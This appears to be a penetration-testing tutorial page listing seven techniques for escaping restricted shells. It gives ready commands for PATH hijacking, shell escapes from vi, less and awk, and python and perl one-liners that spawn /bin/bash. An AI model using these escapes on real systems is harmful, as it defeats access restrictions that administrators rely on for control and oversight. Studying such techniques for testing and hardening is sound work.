Escaping Restricted Shells

Restricted shells (rbash, rksh, rzsh) limit user capabilities to restrict command execution, script access, and system navigation. These are often implemented for security in shared environments.

Common Techniques to Escape

1. Command Substitution

ls -l `whoami`

Executes allowed command via backticks or $(command).

2. Command Chaining

ls; whoami; id

Executes multiple commands if separators like ;, &&, or || are allowed.

3. Command Injection

Inject commands where user input is executed by the shell.

Example:

command `id`

4. PATH Hijacking

Override the PATH variable to run your own scripts in place of allowed commands.

mkdir /tmp/bin
echo "/bin/bash" > /tmp/bin/ls
chmod +x /tmp/bin/ls
export PATH=/tmp/bin:$PATH
ls

5. Using Interactive Programs

Escape via built-in programs like:

vi → :!bash
less → !bash
awk → awk 'BEGIN {system("/bin/bash")}'

6. Scripting Languages

Spawn a new unrestricted shell using:

python3 -c 'import pty; pty.spawn("/bin/bash")'
perl -e 'exec "/bin/bash";'

7. Script Files

Create executable script to escape:

echo "/bin/bash" > /tmp/escape.sh
chmod +x /tmp/escape.sh
/tmp/escape.sh

PreviousWildcard Abuse NextLab

Last updated 8 months ago

hashtagCommon Techniques to Escape

hashtag1. Command Substitution

hashtag2. Command Chaining

hashtag3. Command Injection

hashtag4. PATH Hijacking

hashtag5. Using Interactive Programs

hashtag6. Scripting Languages

hashtag7. Script Files